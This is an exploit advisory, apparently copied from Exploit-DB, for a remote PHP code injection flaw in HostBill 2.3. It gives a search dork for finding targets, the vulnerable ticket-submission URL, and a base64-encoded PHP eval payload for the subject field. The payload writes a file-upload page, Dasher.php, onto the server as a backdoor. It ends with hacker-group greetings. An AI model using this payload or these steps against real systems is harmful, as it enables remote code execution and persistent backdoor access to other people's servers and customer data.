HostBill App 2.3 – Remote Code Injection

• Exploit Database
• 10 阅读

• 作者： Dr.DaShEr
  日期： 2012-01-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18428/

• =-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah, The Most Beneficent, The Most Merciful}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  [~] Tybe: suffering from RemotE injection php code
  [~] Vendor:hostbillapp.com
  [+] Software:HostBill
  [+] Version : v2.3
  [~] 
  [+] author:Dr.DaShE
  [~] TEAM: Team 403
  [?] 
  [-] contact: Dasher403[at]gmail.com
  [?] Date: 2g.J4N.2oll 
  [?] 
  [?] T!ME: 04:46 AM ara-blackhat
  [^] 
  [?]
  =============================================================================== 
  # HostBill script suffering from RemotE injection php code exploit
  =============================================================================== 
  
  
  [!] Exploit Already Tested ... on apache linux server
  
  Dork: Powered by HostBill
  
  [^] Error console:-
  
  http://localhost/billing/index.php?/tickets/new/
   
  [?] poC <X> exploit:- 
   
  http://localhost/billing/index.php?/tickets/new/
  
  inject your evil php code exploit in subject field
  
  encrypt by base64 encoder
  ex:
  
  {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq
  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS
  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2
  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ
  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp
  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3
  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs
  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl
  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI
  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J
  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJEYXNoZXIucGhwIiwidyIpOwpm
  d3JpdGUoJGZvLCRjb2RlKTs='));{/php}
  
  http://localhost/Dasher.php
  
  
  
   
   
  [~]-----------------------------{(Team 403)}------------------------------------------------
  # 
  [~] Greetz tO:Nex & WeeD & R3d D3v!L & HITLR & Red virus & Dr.Dmar & MaFiA & Mr.NsaaNy & ...etc ;
  # 
  [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ; 
  # 
  [?] special SupPoRT : ABH-Sec.Com & packet storm & 1337day & Maksymilian Arciemowicz # ;
  # 
  [~]spechial FR!ND: they all are spechials ;) #; 
  # 
  [~] !'M 4R48!4N 3XPL0!73R. #; 
  # 
  [~](>D!R 4ll 0R D!E<) #; 
  # 
  [~]---------------------------------------------------------------------------------------------